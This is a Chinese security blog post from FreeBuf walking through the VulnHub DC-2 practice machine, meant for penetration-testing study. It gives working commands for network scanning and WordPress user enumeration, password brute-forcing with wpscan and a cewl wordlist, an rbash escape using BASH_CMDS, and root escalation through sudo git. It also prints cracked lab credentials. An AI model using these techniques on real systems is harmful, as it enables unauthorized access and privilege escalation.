VnlnHub DC-2 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

Web安全

^{0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9}

VnlnHub DC-2

xiaopanghacker 2022-09-07 21:18:25 94842

所属地湖南省

本文由 xiaopanghacker 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

靶场搭建

靶场下载地址：https://www.vulnhub.com/entry/dc-2,311/

下载镜像（Mirror版本）

下载下来的文件为 .OVA压缩文件，直接导入vmvare指定解压位置即可

网卡设置和攻击机KALI保持一致即可，这里我选择NAT模式

开机，靶场搭建完毕

渗透测试

首先明确目标，和之前的DC-1靶机一样，目标位5个flags

由于不知道靶机IP地址，所以使用nmap扫描整个网段

nmap -sP -T4 192.168.48.0/24

发现136和137两台主机（1,2,254是网关和广播地址）

136是KALI攻击机，所以靶机地址为192.168.48.137

对靶机进行扫描

nmap -sS -sV -Pn 192.168.48.137

只开启了80端口，存在web

访问web

访问失败

需要在kali中编辑hosts文件

vi /etc/hosts

再次访问网站

获得flag1

flag1提示我们，需要密码字典，但是普通的密码字典肯没用，需要使用cewl，越多密码越好，登录获得下一个flag，如果你找不到，登录下一个

在网站主页没有发现可以登录的地方，我们搜索一下敏感目录

扫描敏感目录发现wordpress后台

使用kali自带的工具wpscan进行爆破

wpscan常用参数
--update更新病毒数据库
-h帮助信息
--url指定url
--enumerate/-evp/vt/t/u/p
vp为扫描插件中漏洞，vt为扫描主题中的漏洞,t为扫描主题，u为爆破用户名，p为扫描安装的插件

扫描列举用户名

wpscan --url http://dc-2/ -e u

列举出admin、jerry、tom三个用户

将三个用户名编辑为一个用户字典文件dc2user.txt

vi dc2user.txt

根据flag1提示，使用cewl爬取网站关键词来生成密码字典

cewl http://dc-2/-w dc2pass.txt

-w 指定输出文件

查看一下文件，看是否生成成功

cat dc2pass.txt

利用wpscan进行爆破

wpscan --url http://dc-2/-U dc2user.txt -P dc2pass.txt

爆破出两个用户的密码

jerry / adipiscing

tom / parturient

先用jerry登录试试

登录成功

在page中找到flag2

flag2提示：如果你不能利用WordPress，也不能走捷径，还有另外的方式，祝愿你能找到。

尝试用另一个账号登录试试

登录成功

但是没有找到任何线索

没有思路了，去看了别人的通关记录，发现还扫出了另一个端口开放，才知道，是因为扫描的时候没有指定全端口扫描，漏扫了端口

进行全端口扫描

-p 1-65535 或者-p- 都可以指定全端口扫描

发现存在ssh远程登录服务，刚tom账号登录后台没有找到线索，现在用tom账号登录一下ssh服务试试

ssh tom@192.168.48.137 -p 7744

登录成功

发现目录存在flag3.txt文件

cat flag3.txt 发现cat命令不可用

more flag3.txt 发现more命令也不可用

查看一下哪些命令可用

echo $PATHtom@DC2:~$ echo /home/tom/usr/bin/*

发现可以用的命令：less、ls、scp、vi

用less和vi都可以查看文件，我这里用vi

vi flag3.txt

贫穷的老tom总是走在jerry后面，也许他应该su缓解他的压力

意思让那个我们su 切换到jerry用户

但是不能执行su命令

所以我们需要绕过rbash（受限的bash）（这个我也是第一次接触，网上找的）

执行如下命令：

BASH_CMDS[a]=/bin/sh;a // 把/bin/bash给a变量

export PATH=$PATH:/bin/ // 将/bin 作为PATH环境变量导出

export PATH=$PATH:/usr/bin // 将/usr/bin作为PATH环境变量导出

接下里su到jerry用户

切换到jerry的家目录

cd /home/jerry

发现flag4.txt

cat flag4.txt

flag4的意思是很高兴你已经到达这，但是你还没有到家，你需要找到最后的flag，这你没有给你的提示

现在我们还没有获得最高权限，所以我们只能通过提权方式获得最高权限

Linux提权

1、内核提权

2、suid提权

3、sudo提权

4、数据库提权

sudo -l 查看有没有特权命令

发现git特权命令，且没有密码

/usr/bin/sudo git -p help config

!/bin/bash

成功提权

cd /root

cat final-flag.txt

# 渗透测试 # 网络安全 # web安全 # 系统安全 # 网络安全技术

免责声明

1.一般免责声明：本文所提供的技术信息仅供参考，不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》，作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明：文中技术内容可能不适用于所有情况或系统，在实际应用前请充分测试和评估。若因使用不当造成的任何问题，相关方不承担责任。

3. 更新声明：技术发展迅速，文章内容可能存在滞后性。读者需自行判断信息的时效性，因依据过时内容产生的后果，作者及发布平台不承担责任。

xiaopanghacker

这家伙太懒了，还未填写个人描述！

已在FreeBuf发表 36 篇文章

本文为 xiaopanghacker 独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多